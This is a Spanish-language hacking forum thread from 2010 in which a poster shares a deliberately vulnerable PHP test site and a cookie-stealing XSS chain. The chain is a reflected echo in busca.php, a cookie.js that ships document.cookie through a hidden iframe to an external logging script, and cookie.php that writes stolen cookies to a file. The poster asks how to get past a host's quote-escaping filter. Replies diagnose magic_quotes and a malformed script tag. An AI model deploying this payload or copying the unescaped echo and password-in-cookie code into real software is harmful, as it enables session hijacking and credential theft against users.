Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: Dr [F] en 29 Julio 2010, 04:42 am


Título: Problema con añadimiento en codigo
Publicado por: Dr [F] en 29 Julio 2010, 04:42 am
Hola gente miren estaba montando un servidor de pruebas y lo subi a mi@

los codigos son los siguientes:

webv.php

Código:
<?php
session_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bienvenidos a XSS testing</title>
</head>
   
<body><center>
<h1><font color=red>XSS Testing</font></h1></center>
<div align=center>
<form method="post" action="busca.php" >
<input type="text" name="busca" value="Buscador Vulnerable" maxlength="222">
<input type="submit" value="buscar">
</form>
</div>
<br><br><br>
<form method="post" action="pag2.php">
<font color=red>Ingrese su usuario:    <input type="text" name="nombre">
<br>
Ingrese su contraseña: </font><input type="password" name="password">
<br>
<input type="submit" value="enviar">
</form>
</body>
</html>

busca.php

Código:
<?php
$bus = $_REQUEST['busca'];

echo ($bus);
?>

pag2.php

Código:
<?php
$user=$_POST['nombre'];
$pass = $_POST['password'];
if ($user == "franco"  && $pass == "franco")
{
setcookie("senia", $user."-". $pass, time()+60*60*24*365, "/");
echo "Bienvenido $user";
}
else
{
echo "usuario o contraseña incorrcto:";
}
?>

cookie.js

Código:
document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>");

cookie.php

Código:
<?php
$cookie=$_GET['c'];
$file=fopen('archivo.txt', 'a');
fwrite($file, $cookie.' - ');
fclose($file);
?>

esta es la url vulnerable a nivel localhost:

http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script>

El codigo que interpretaria busca.php seria <script src="Http://localhost/cookie.js"</script>

pero mi@ es el siguiente

Código:
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
<!-- Inserted by miarroba -->
<script type="text/javascript" src="http://weborama.miarroba.info/?d=hosting&amp;h=pruebas18p.webcindario.com&amp;t=1280371273&amp;k=5c4e108c6ef14544954ee758c7790aa0"></script>
<!-- Inserted by miarroba -->



Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script

alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ?

gracias :)



Título: Re: Problema con añadimiento en codigo
Publicado por: Ari Slash en 29 Julio 2010, 04:55 am
no se que filtro ni nada xD

pero prueba en este hosting www.zymic.com
para pruebas si que es bueno


saludos

Título: Re: Problema con añadimiento en codigo
Publicado por: Dr [F] en 29 Julio 2010, 06:20 am
no pasa por que el hosting sea malo, solo tiene un pequeño filtro que quiero saber como evadirlo :)

igual gracias por la respuesta :)

Título: Re: Problema con añadimiento en codigo
Publicado por: Shell Root en 29 Julio 2010, 18:19 pm
Código
  1. <script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
No entiendo el porque escapas las comillas dobles. No debería ser así: (Además de cerrar bien la etiqueta <script>)
Código
  1. <script src="http://www.pruebas18p.webcindario.com/cookie.js"></script>

Título: Re: Problema con añadimiento en codigo
Publicado por: Dr [F] en 30 Julio 2010, 00:43 am
disculpa Shell, pero no entiendo en la parte que dices que escapo de las comillas dobles  :-[.

Podrias expresarte mejor ?

Muchas gracias

Título: Re: Problema con añadimiento en codigo
Publicado por: Erfiug en 30 Julio 2010, 01:39 am
si pones un backslash delante de las comillas es para indicar que quieres mostrar ese carácter (las comillas) y no para delimitar un string.

Título: Re: Problema con añadimiento en codigo
Publicado por: Dr [F] en 31 Julio 2010, 23:57 pm
creo que no me entendieron -.-
Código:
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"></script>

ese codigo lo añade mi arroba, yo pongo este:

Código:
http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>

yo no añado los backslashes, los añade mi arroba

PD: Shell root, la etiqueta no esta mal cerrada, funciona de las dos maneras

Título: Re: Problema con añadimiento en codigo
Publicado por: ~ Yoya ~ en 1 Agosto 2010, 02:12 am
Pasa que al parecer tienes la directiva magic_quotes_gpc(GET, POST, COOKIE) ON del php.ini, que escapa las comillas simples y dobles con barras invertidas...

Info:
http://foro.undersecurity.net/read.php?15,6470

Título: Re: Problema con añadimiento en codigo
Publicado por: Shell Root en 1 Agosto 2010, 02:13 am
Cita de: frankitox en 31 Julio 2010, 23:57 pm
Código:
http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>
Analiza ese código y comparalo con este ejemplo.
Código:
<bHola</b>
Está bien cerrada la etiqueta?

Título: Re: Problema con añadimiento en codigo
Publicado por: Dr [F] en 1 Agosto 2010, 04:32 am
miren, hagan de cuenta como que no dije nada.. dale ?
jaja muchas gracias
perdon  :-[

Título: Re: Problema con añadimiento en codigo
Publicado por: ~ Yoya ~ en 1 Agosto 2010, 04:34 am
Cita de: frankitox en  1 Agosto 2010, 04:32 am
miren, hagan de cuenta como que no dije nada.. dale ?
jaja muchas gracias
perdon  :-[

lol, mejor piensa antes de postear...

Cita de: ~ Yoya ~ en  1 Agosto 2010, 02:12 am
Pasa que al parecer tienes la directiva magic_quotes_gpc(GET, POST, COOKIE) ON del php.ini, que escapa las comillas simples y dobles con barras invertidas...

Info:
http://foro.undersecurity.net/read.php?15,6470


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines